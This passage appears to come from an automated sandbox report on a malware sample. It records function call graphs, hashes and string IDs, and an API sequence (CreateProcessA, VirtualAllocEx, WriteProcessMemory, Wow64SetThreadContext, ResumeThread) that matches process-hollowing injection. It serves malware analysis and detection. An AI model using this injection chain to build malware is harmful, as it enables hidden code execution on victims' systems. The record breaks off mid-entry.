32013 a0a7d76 32013->32004 32017 a0a7d58 32016->32017 32019 a0a7d98 DrawTextExW 32017->32019 32020 a0a7d89 DrawTextExW 32017->32020 32018 a0a7d76 32018->32004 32019->32018 32020->32018 32022 a0a7dc9 32021->32022 32023 a0a7df6 32022->32023 32031 a0a7e18 32022->32031 32036 a0a7e09 32022->32036 32023->32013 32027 a0a7d98 32026->32027 32028 a0a7df6 32027->32028 32029 a0a7e18 DrawTextExW 32027->32029 32030 a0a7e09 DrawTextExW 32027->32030 32028->32013 32029->32028 32030->32028 32033 a0a7e39 32031->32033 32032 a0a7e4e 32032->32023 32033->32032 32041 a0a70e8 32033->32041 32035 a0a7eb9 32038 a0a7e18 32036->32038 32037 a0a7e4e 32037->32023 32038->32037 32039 a0a70e8 DrawTextExW 32038->32039 32040 a0a7eb9 32039->32040 32043 a0a70f3 32041->32043 32042 a0a9e89 32042->32035 32043->32042 32047 a0aa9ef 32043->32047 32051 a0aaa00 32043->32051 32044 a0a9f9c 32044->32035 32048 a0aaa00 32047->32048 32054 a0a9a34 32048->32054 32052 a0a9a34 DrawTextExW 32051->32052 32053 a0aaa1d 32052->32053 32053->32044 32056 a0aaa38 DrawTextExW 32054->32056 32057 a0aaa1d 32056->32057 32057->32044 31921 2fe7a30 31922 2fe7a3b 31921->31922 31924 2fe7b68 31921->31924 31925 2fe7b8d 31924->31925 31929 2fe8080 31925->31929 31933 2fe8070 31925->31933 31931 2fe80a7 31929->31931 31930 2fe8184 31930->31930 31931->31930 31937 2fe7ccc 31931->31937 31934 2fe8080 31933->31934 31935 2fe8184 31934->31935 31936 2fe7ccc CreateActCtxA 31934->31936 31935->31935 31936->31935 31938 2fe9110 CreateActCtxA 31937->31938 31940 2fe91d3 31938->31940 32058 a39cd47 32062 a39d630 32058->32062 32081 a39d620 32058->32081 32059 a39cd69 32063 a39d64a 32062->32063 32064 a39d66e 32063->32064 32100 a39dcbb 32063->32100 32105 a39e1c6 32063->32105 32109 a39e027 32063->32109 32117 a39dac7 32063->32117 32122 a39e2a4 32063->32122 32127 a39dbc4 32063->32127 32132 a39db45 32063->32132 32137 a39dda0 32063->32137 32141 a39e041 32063->32141 32145 a39da4a 32063->32145 32150 a39dd36 32063->32150 32158 a39e254 32063->32158 32162 a39da34 32063->32162 32167 a39dc55 32063->32167 32172 a39de5f 32063->32172 32176 a39dd5d 32063->32176 32064->32059 32082 a39d625 32081->32082 32083 a39d66e 32082->32083 32084 a39dcbb 2 API calls 32082->32084 32085 a39dd5d 2 API calls 32082->32085 32086 a39de5f 2 API calls 32082->32086 32087 a39dc55 2 API calls 32082->32087 32088 a39da34 2 API calls 32082->32088 32089 a39e254 2 API calls 32082->32089 32090 a39dd36 4 API calls 32082->32090 32091 a39da4a 2 API calls 32082->32091 32092 a39e041 2 API calls 32082->32092 32093 a39dda0 2 API calls 32082->32093 32094 a39db45 2 API calls 32082->32094 32095 a39dbc4 2 API calls 32082->32095 32096 a39e2a4 2 API calls 32082->32096 32097 a39dac7 2 API calls 32082->32097 32098 a39e027 4 API calls 32082->32098 32099 a39e1c6 2 API calls 32082->32099 32083->32059 32084->32083 32085->32083 32086->32083 32087->32083 32088->32083 32089->32083 32090->32083 32091->32083 32092->32083 32093->32083 32094->32083 32095->32083 32096->32083 32097->32083 32098->32083 32099->32083 32101 a39dc5c 32100->32101 32180 a39bf18 32101->32180 32184 a39bf11 32101->32184 32102 a39dc88 32102->32102 32188 a39c598 32105->32188 32192 a39c590 32105->32192 32106 a39e1ea 32110 a39e02d 32109->32110 32111 a39dbc3 32110->32111 32196 a39e7ee 32110->32196 32201 a39e7f0 32110->32201 32112 a39dc88 32111->32112 32113 a39bf18 ResumeThread 32111->32113 32114 a39bf11 ResumeThread 32111->32114 32113->32112 32114->32112 32119 a39da4e 32117->32119 32214 a39c820 32119->32214 32218 a39c814 32119->32218 32124 a39dc74 32122->32124 32123 a39dc88 32124->32123 32125 a39bf18 ResumeThread 32124->32125 32126 a39bf11 ResumeThread 32124->32126 32125->32123 32126->32123 32128 a39dbde 32127->32128 32130 a39bf18 ResumeThread 32128->32130 32131 a39bf11 ResumeThread 32128->32131 32129 a39dc88 32130->32129 32131->32129 32133 a39db4b 32132->32133 32134 a39db79 32133->32134 32135 a39c820 CreateProcessA 32133->32135 32136 a39c814 CreateProcessA 32133->32136 32134->32064 32135->32134 32136->32134 32139 a39c598 WriteProcessMemory 32137->32139 32140 a39c590 WriteProcessMemory 32137->32140 32138 a39db98 32138->32064 32139->32138 32140->32138 32222 a39c680 32141->32222 32226 a39c688 32141->32226 32142 a39db98 32142->32064 32146 a39da58 32145->32146 32148 a39c820 CreateProcessA 32146->32148 32149 a39c814 CreateProcessA 32146->32149 32147 a39db79 32147->32064 32148->32147 32149->32147 32151 a39dd3e 32150->32151 32153 a39dbc3 32151->32153 32156 a39e7ee 2 API calls 32151->32156 32157 a39e7f0 2 API calls 32151->32157 32152 a39dc88 32153->32152 32154 a39bf18 ResumeThread 32153->32154 32155 a39bf11 ResumeThread 32153->32155 32154->32152 32155->32152 32156->32153 32157->32153 32230 a39c4d8 32158->32230 32234 a39c4d1 32158->32234 32159 a39e272 32163 a39da4e 32162->32163 32165 a39c820 CreateProcessA 32163->32165 32166 a39c814 CreateProcessA 32163->32166 32164 a39db79 32164->32064 32165->32164 32166->32164 32168 a39dc5b 32167->32168 32170 a39bf18 ResumeThread 32168->32170 32171 a39bf11 ResumeThread 32168->32171 32169 a39dc88 32170->32169 32171->32169 32174 a39c3f8 Wow64SetThreadContext 32172->32174 32175 a39c400 Wow64SetThreadContext 32172->32175 32173 a39de79 32173->32064 32174->32173 32175->32173 32177 a39de98 32176->32177 32178 a39c598 WriteProcessMemory 32177->32178 32179 a39c590 WriteProcessMemory 32177->32179 32178->32177 32179->32177 32181 a39bf58 ResumeThread 32180->32181 32183 a39bf89 32181->32183 32183->32102 32185 a39bf58 ResumeThread 32184->32185 32187 a39bf89 32185->32187 32187->32102 32189 a39c5e0 WriteProcessMemory 32188->32189 32191 a39c637 32189->32191 32191->32106 32193 a39c5e0 WriteProcessMemory 32192->32193 32195 a39c637 32193->32195 32195->32106 32197 a39e7f0 32196->32197 32206 a39c3f8 32197->32206 32210 a39c400 32197->32210 32198 a39e81b 32198->32111 32202 a39e805 32201->32202 32204 a39c3f8 Wow64SetThreadContext 32202->32204 32205 a39c400 Wow64SetThreadContext 32202->32205 32203 a39e81b 32203->32111 32204->32203 32205->32203 32207 a39c445 Wow64SetThreadContext 32206->32207 32209 a39c48d 32207->32209 32209->32198 32211 a39c445 Wow64SetThreadContext 32210->32211 32213 a39c48d 32211->32213 32213->32198 32215 a39c8a9 CreateProcessA 32214->32215 32217 a39ca6b 32215->32217 32217->32217 32219 a39c8a9 CreateProcessA 32218->32219 32221 a39ca6b 32219->32221 32221->32221 32223 a39c689 ReadProcessMemory 32222->32223 32225 a39c717 32223->32225 32225->32142 32227 a39c6d3 ReadProcessMemory 32226->32227 32229 a39c717 32227->32229 32229->32142 32231 a39c518 VirtualAllocEx 32230->32231 32233 a39c555 32231->32233 32233->32159 32235 a39c518 VirtualAllocEx 32234->32235 32237 a39c555 32235->32237 32237->32159

                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                  Function 0A0A0040 Relevance: 7.7, Strings: 4, Instructions: 2697COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1745056349.000000000A0A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0A0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_a0a0000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: (ofq$4'fq$4'fq$4'fq
                                                                                                                                                                                  • API String ID: 0-1260671024
                                                                                                                                                                                  • Opcode ID: 2b9c53e821b33b42e0b8522c9b53dfe8d8a789ff110fea8efdc8af119556d9db
                                                                                                                                                                                  • Instruction ID: 70906bb2412fc95046f59b2bd14e2bded1e853cfe03cc8323c99962f19b57e04
                                                                                                                                                                                  • Opcode Fuzzy Hash: 2b9c53e821b33b42e0b8522c9b53dfe8d8a789ff110fea8efdc8af119556d9db
                                                                                                                                                                                  • Instruction Fuzzy Hash: 21531974A01219DFCB68CFA8C988A9DB7B2BF59310F1585E9D449AB361DB30ED81CF50
                                                                                                                                                                                  Function 02FE0861 Relevance: 3.9, Strings: 3, Instructions: 106COMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 1483 2fe0861-2fe086c 1484 2fe086e-2fe0889 1483->1484 1485 2fe08b3 1483->1485 1486 2fe088e-2fe08a2 1484->1486 1487 2fe08b9-2fe08c3 1485->1487 1488 2fe0e94-2fe0e9e 1485->1488 1489 2fe0e78 1486->1489 1490 2fe08a8 1486->1490 1487->1488 1491 2fe08c9-2fe08db 1487->1491 1506 2fe0e7b call 2fe0e45 1489->1506 1507 2fe0e7b call 2fe0f40 1489->1507 1508 2fe0e7b call 2fe0ec1 1489->1508 1493 2fe08af 1490->1493 1494 2fe0988-2fe098c 1490->1494 1495 2fe09b9-2fe09ca 1490->1495 1496 2fe0a46-2fe0a5d 1490->1496 1497 2fe0c52-2fe0c7e 1490->1497 1498 2fe0ba3-2fe0bb4 1490->1498 1499 2fe0bd0-2fe0be5 1490->1499 1500 2fe0b61-2fe0b72 1490->1500 1491->1486 1493->1485 1494->1488 1502 2fe0992-2fe099c 1494->1502 1495->1486 1496->1486 1497->1486 1498->1486 1499->1486 1500->1486 1501 2fe0e81-2fe0e93 1502->1488 1503 2fe09a2-2fe09b4 1502->1503 1503->1486 1506->1501 1507->1501 1508->1501
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1733469365.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2fe0000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: )>e*$Tefq$Tefq
                                                                                                                                                                                  • API String ID: 0-1750662222
                                                                                                                                                                                  • Opcode ID: 61ccab2203d3d6e897b3a9b5f6154cdcfd7828f9b6a66a6da8db68436e850a8d
                                                                                                                                                                                  • Instruction ID: b836cc022eb30b1317626bbff2a8e079660486572ef5962c05f279e50b3a90ce
                                                                                                                                                                                  • Opcode Fuzzy Hash: 61ccab2203d3d6e897b3a9b5f6154cdcfd7828f9b6a66a6da8db68436e850a8d
                                                                                                                                                                                  • Instruction Fuzzy Hash: 1341A131E20209CFCB59DF69C85189FFBB5BF89200B90C5ABD522EB155CB709A45CFA1
                                                                                                                                                                                  Function 0A0A2DD8 Relevance: 2.9, Strings: 2, Instructions: 351COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1745056349.000000000A0A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0A0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_a0a0000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: 4|kq$4|kq
                                                                                                                                                                                  • API String ID: 0-2416722708
                                                                                                                                                                                  • Opcode ID: 51d522f0536d88573a2157cfa2904cc0fd4cd783eaaaf41ec1adcddc53003507
                                                                                                                                                                                  • Instruction ID: 1c7401e0f181e851df4b11a40981f4bba2abfb2b07192c1a2d2434875bb9f225
                                                                                                                                                                                  • Opcode Fuzzy Hash: 51d522f0536d88573a2157cfa2904cc0fd4cd783eaaaf41ec1adcddc53003507
                                                                                                                                                                                  • Instruction Fuzzy Hash: 3EC1E935B00219DFCB69DFA9C49496EBBF2BF95340B2684A9D4059F361CB31DC81CB92
                                                                                                                                                                                  Function 02FE0E45 Relevance: 2.7, Strings: 2, Instructions: 175COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1733469365.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2fe0000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: Tefq$Tefq
                                                                                                                                                                                  • API String ID: 0-1395890369
                                                                                                                                                                                  • Opcode ID: a95b0e8cc64c50abfffdde3ce3d55cacb82c94d9ed75c6d9a6bde4a1a9517b0e
                                                                                                                                                                                  • Instruction ID: 6e0b67bef22af5772d5d058650d3409707faa670d47033cba333398f4b295a04
                                                                                                                                                                                  • Opcode Fuzzy Hash: a95b0e8cc64c50abfffdde3ce3d55cacb82c94d9ed75c6d9a6bde4a1a9517b0e
                                                                                                                                                                                  • Instruction Fuzzy Hash: 52510675B041868FCB06CFB9C9946AEFFB2FF8A304B154099D646BB265CA704D42CB91
                                                                                                                                                                                  Function 02FE0EC1 Relevance: 2.7, Strings: 2, Instructions: 172COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1733469365.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2fe0000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: Tefq$Tefq
                                                                                                                                                                                  • API String ID: 0-1395890369
                                                                                                                                                                                  • Opcode ID: 76ded535df45995ba69c0cccaa299522c1f95df1663cd01b79b3c2c1768c177f
                                                                                                                                                                                  • Instruction ID: cbc61571f896eb8122d42731374aa6f6bd0d4b1f1aba874505f2b4b1e04c578a
                                                                                                                                                                                  • Opcode Fuzzy Hash: 76ded535df45995ba69c0cccaa299522c1f95df1663cd01b79b3c2c1768c177f
                                                                                                                                                                                  • Instruction Fuzzy Hash: 7D512671B041868FCB06CFB9C9506AEFFB2FF8A314B14449DD686BB265CA704D42CB91
                                                                                                                                                                                  Function 02FE0F40 Relevance: 2.6, Strings: 2, Instructions: 121COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1733469365.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2fe0000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: Tefq$Tefq
                                                                                                                                                                                  • API String ID: 0-1395890369
                                                                                                                                                                                  • Opcode ID: 295218bec87254116c2ea27f9cd6678d2e58aa819e67e1918a07c856698dd7f1
                                                                                                                                                                                  • Instruction ID: adcea95121ba79ba6a12f87c87540cb8dac4dcd6f44abcc6bcd703eb57b6948d
                                                                                                                                                                                  • Opcode Fuzzy Hash: 295218bec87254116c2ea27f9cd6678d2e58aa819e67e1918a07c856698dd7f1
                                                                                                                                                                                  • Instruction Fuzzy Hash: A3418171B101598FDF04DFA9C89466FBBB6FB88740F10852AD606FB364CA749E01CB92
                                                                                                                                                                                  Function 0A39FB58 Relevance: .4, Instructions: 369COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1745275323.000000000A390000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A390000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_a390000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 86246f64194d8d0f2530cb712ae36aba7a7090603228daf2f6518b47302de015
                                                                                                                                                                                  • Instruction ID: 0304b0b01c60017fe5784aba57254673de2eee0fae6640ce2d62b2c4b3361fa6
                                                                                                                                                                                  • Opcode Fuzzy Hash: 86246f64194d8d0f2530cb712ae36aba7a7090603228daf2f6518b47302de015
                                                                                                                                                                                  • Instruction Fuzzy Hash: 89D1BE71B006048FDF25EB79C850BAEBBEBAF89340F14846ED206CB691DB35E901CB51
                                                                                                                                                                                  Function 0A399070 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 278windowCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 1074 a399070-a399092 1077 a39910e-a39eb92 PostMessageW 1074->1077 1078 a399094-a3990b1 1074->1078 1084 a39eb9b-a39ebaf 1077->1084 1085 a39eb94-a39eb9a 1077->1085 1079 a399128-a399139 1078->1079 1080 a3990b3 1078->1080 1091 a39913c-a39914b 1079->1091 1092 a3991b6-a3991bc 1079->1092 1082 a39911d-a399127 1080->1082 1083 a3990b5-a3990d2 1080->1083 1082->1079 1086 a39914e-a39915b 1083->1086 1087 a3990d4-a3990e2 1083->1087 1085->1084 1089 a39915e-a39f002 1086->1089 1087->1089 1090 a3990e4-a39eaf7 1087->1090 1101 a39f009-a39f03f 1089->1101 1102 a39f004 1089->1102 1103 a39eaf9-a39eaff 1090->1103 1104 a39eb00-a39eb14 1090->1104 1091->1086 1094 a399238-a399300 1092->1094 1095 a3991be-a3991cb 1092->1095 1095->1094 1108 a39f049 1101->1108 1109 a39f041 1101->1109 1102->1101 1103->1104 1110 a39f04a 1108->1110 1109->1108 1110->1110
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 0A39EB85
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1745275323.000000000A390000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A390000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_a390000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: MessagePost
                                                                                                                                                                                  • String ID: 4-xa$4-xa$56
                                                                                                                                                                                  • API String ID: 410705778-1661249417
                                                                                                                                                                                  • Opcode ID: 2eadf942892072e43abdc73f857c3fd89fa905556444ef4fc152fa70d5f20f1d
                                                                                                                                                                                  • Instruction ID: a492620c1949850a68dfb64ef038d278dfdf52e92a0e78f50f037cfe78781cf7
                                                                                                                                                                                  • Opcode Fuzzy Hash: 2eadf942892072e43abdc73f857c3fd89fa905556444ef4fc152fa70d5f20f1d
                                                                                                                                                                                  • Instruction Fuzzy Hash: A6B1EA768083889FDF11CFA8C895BDABFF4EF4A210F15448AE580AB262C7745445CFA1
                                                                                                                                                                                  Function 0A39C814 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 249processCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 1319 a39c814-a39c8b5 1321 a39c8ee-a39c90e 1319->1321 1322 a39c8b7-a39c8c1 1319->1322 1327 a39c910-a39c91a 1321->1327 1328 a39c947-a39c976 1321->1328 1322->1321 1323 a39c8c3-a39c8c5 1322->1323 1325 a39c8e8-a39c8eb 1323->1325 1326 a39c8c7-a39c8d1 1323->1326 1325->1321 1329 a39c8d3 1326->1329 1330 a39c8d5-a39c8e4 1326->1330 1327->1328 1331 a39c91c-a39c91e 1327->1331 1338 a39c978-a39c982 1328->1338 1339 a39c9af-a39ca69 CreateProcessA 1328->1339 1329->1330 1330->1330 1332 a39c8e6 1330->1332 1333 a39c941-a39c944 1331->1333 1334 a39c920-a39c92a 1331->1334 1332->1325 1333->1328 1336 a39c92c 1334->1336 1337 a39c92e-a39c93d 1334->1337 1336->1337 1337->1337 1340 a39c93f 1337->1340 1338->1339 1341 a39c984-a39c986 1338->1341 1350 a39ca6b-a39ca71 1339->1350 1351 a39ca72-a39caf8 1339->1351 1340->1333 1343 a39c9a9-a39c9ac 1341->1343 1344 a39c988-a39c992 1341->1344 1343->1339 1345 a39c994 1344->1345 1346 a39c996-a39c9a5 1344->1346 1345->1346 1346->1346 1347 a39c9a7 1346->1347 1347->1343 1350->1351 1361 a39cb08-a39cb0c 1351->1361 1362 a39cafa-a39cafe 1351->1362 1363 a39cb1c-a39cb20 1361->1363 1364 a39cb0e-a39cb12 1361->1364 1362->1361 1365 a39cb00 1362->1365 1367 a39cb30-a39cb34 1363->1367 1368 a39cb22-a39cb26 1363->1368 1364->1363 1366 a39cb14 1364->1366 1365->1361 1366->1363 1370 a39cb46-a39cb4d 1367->1370 1371 a39cb36-a39cb3c 1367->1371 1368->1367 1369 a39cb28 1368->1369 1369->1367 1372 a39cb4f-a39cb5e 1370->1372 1373 a39cb64 1370->1373 1371->1370 1372->1373 1374 a39cb65 1373->1374 1374->1374
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0A39CA56
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1745275323.000000000A390000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A390000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_a390000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CreateProcess
                                                                                                                                                                                  • String ID: 4-xa$4-xa
                                                                                                                                                                                  • API String ID: 963392458-1296441845
                                                                                                                                                                                  • Opcode ID: f4ccbc109d226a8f4230628efb56e1fbf1d5cf83e34a9fab85673baae64bed5b
                                                                                                                                                                                  • Instruction ID: 08da614cf9cb820a0ada9cd53d55b15f06bd70b85abcff35df8405fa9ad17fcc
                                                                                                                                                                                  • Opcode Fuzzy Hash: f4ccbc109d226a8f4230628efb56e1fbf1d5cf83e34a9fab85673baae64bed5b
                                                                                                                                                                                  • Instruction Fuzzy Hash: EBA18C71D10219DFDF20DF68C881BEEBBB2BF48314F1481AAE849A7240DB749985CF91
                                                                                                                                                                                  Function 0A39C820 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 243processCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 1376 a39c820-a39c8b5 1378 a39c8ee-a39c90e 1376->1378 1379 a39c8b7-a39c8c1 1376->1379 1384 a39c910-a39c91a 1378->1384 1385 a39c947-a39c976 1378->1385 1379->1378 1380 a39c8c3-a39c8c5 1379->1380 1382 a39c8e8-a39c8eb 1380->1382 1383 a39c8c7-a39c8d1 1380->1383 1382->1378 1386 a39c8d3 1383->1386 1387 a39c8d5-a39c8e4 1383->1387 1384->1385 1388 a39c91c-a39c91e 1384->1388 1395 a39c978-a39c982 1385->1395 1396 a39c9af-a39ca69 CreateProcessA 1385->1396 1386->1387 1387->1387 1389 a39c8e6 1387->1389 1390 a39c941-a39c944 1388->1390 1391 a39c920-a39c92a 1388->1391 1389->1382 1390->1385 1393 a39c92c 1391->1393 1394 a39c92e-a39c93d 1391->1394 1393->1394 1394->1394 1397 a39c93f 1394->1397 1395->1396 1398 a39c984-a39c986 1395->1398 1407 a39ca6b-a39ca71 1396->1407 1408 a39ca72-a39caf8 1396->1408 1397->1390 1400 a39c9a9-a39c9ac 1398->1400 1401 a39c988-a39c992 1398->1401 1400->1396 1402 a39c994 1401->1402 1403 a39c996-a39c9a5 1401->1403 1402->1403 1403->1403 1404 a39c9a7 1403->1404 1404->1400 1407->1408 1418 a39cb08-a39cb0c 1408->1418 1419 a39cafa-a39cafe 1408->1419 1420 a39cb1c-a39cb20 1418->1420 1421 a39cb0e-a39cb12 1418->1421 1419->1418 1422 a39cb00 1419->1422 1424 a39cb30-a39cb34 1420->1424 1425 a39cb22-a39cb26 1420->1425 1421->1420 1423 a39cb14 1421->1423 1422->1418 1423->1420 1427 a39cb46-a39cb4d 1424->1427 1428 a39cb36-a39cb3c 1424->1428 1425->1424 1426 a39cb28 1425->1426 1426->1424 1429 a39cb4f-a39cb5e 1427->1429 1430 a39cb64 1427->1430 1428->1427 1429->1430 1431 a39cb65 1430->1431 1431->1431
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0A39CA56
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1745275323.000000000A390000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A390000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_a390000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CreateProcess
                                                                                                                                                                                  • String ID: 4-xa$4-xa
                                                                                                                                                                                  • API String ID: 963392458-1296441845
                                                                                                                                                                                  • Opcode ID: 8aca8e2a7cde27c3e08dde67a889fb4ffa2ab67c771568d822c73df7a698831c
                                                                                                                                                                                  • Instruction ID: ce3bf367ea02198ebdcd2649a23e568cc16152d69b0a874ce978395f8111a77d
                                                                                                                                                                                  • Opcode Fuzzy Hash: 8aca8e2a7cde27c3e08dde67a889fb4ffa2ab67c771568d822c73df7a698831c
                                                                                                                                                                                  • Instruction Fuzzy Hash: 6C916C71D10219DFDF24DF69C841BEEBBB2BF48314F1491AAE809A7240DB749985CF91
                                                                                                                                                                                  Function 02FEE510 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 195COMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 1575 2fee510-2fee51f 1576 2fee54b-2fee54f 1575->1576 1577 2fee521-2fee52e call 2feba60 1575->1577 1578 2fee563-2fee5a4 1576->1578 1579 2fee551-2fee55b 1576->1579 1582 2fee544 1577->1582 1583 2fee530-2fee53e call 2fee7a8 1577->1583 1586 2fee5a6-2fee5ae 1578->1586 1587 2fee5b1-2fee5bf 1578->1587 1579->1578 1582->1576 1583->1582 1591 2fee680-2fee740 1583->1591 1586->1587 1589 2fee5e3-2fee5e5 1587->1589 1590 2fee5c1-2fee5c6 1587->1590 1592 2fee5e8-2fee5ef 1589->1592 1593 2fee5c8-2fee5cf call 2fedef4 1590->1593 1594 2fee5d1 1590->1594 1625 2fee748-2fee773 GetModuleHandleW 1591->1625 1626 2fee742-2fee745 1591->1626 1597 2fee5fc-2fee603 1592->1597 1598 2fee5f1-2fee5f9 1592->1598 1596 2fee5d3-2fee5e1 1593->1596 1594->1596 1596->1592 1600 2fee605-2fee60d 1597->1600 1601 2fee610-2fee619 call 2fedf04 1597->1601 1598->1597 1600->1601 1606 2fee61b-2fee623 1601->1606 1607 2fee626-2fee62b 1601->1607 1606->1607 1608 2fee62d-2fee634 1607->1608 1609 2fee649-2fee656 1607->1609 1608->1609 1611 2fee636-2fee646 call 2fedf14 call 2fedf24 1608->1611 1616 2fee658-2fee676 1609->1616 1617 2fee679-2fee67f 1609->1617 1611->1609 1616->1617 1627 2fee77c-2fee790 1625->1627 1628 2fee775-2fee77b 1625->1628 1626->1625 1628->1627
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1733469365.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2fe0000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: HandleModule
                                                                                                                                                                                  • String ID: 4-xa
                                                                                                                                                                                  • API String ID: 4139908857-3016476521
                                                                                                                                                                                  • Opcode ID: 65de429cdb515cf241914bca496c43a97f904b2a89c50865177ee6aa6f3a1c0e
                                                                                                                                                                                  • Instruction ID: 756bccf4e1a2f5faa9d0c9bbc10effd11b27cedce9467a89ce6dc7a7583880e8
                                                                                                                                                                                  • Opcode Fuzzy Hash: 65de429cdb515cf241914bca496c43a97f904b2a89c50865177ee6aa6f3a1c0e
                                                                                                                                                                                  • Instruction Fuzzy Hash: DA7142B0A00B058FDB25DF29D54475ABBF2BF88354F00892DD68AD7A50EB34E949CF91
                                                                                                                                                                                  Function 02FE9104 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 101COMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

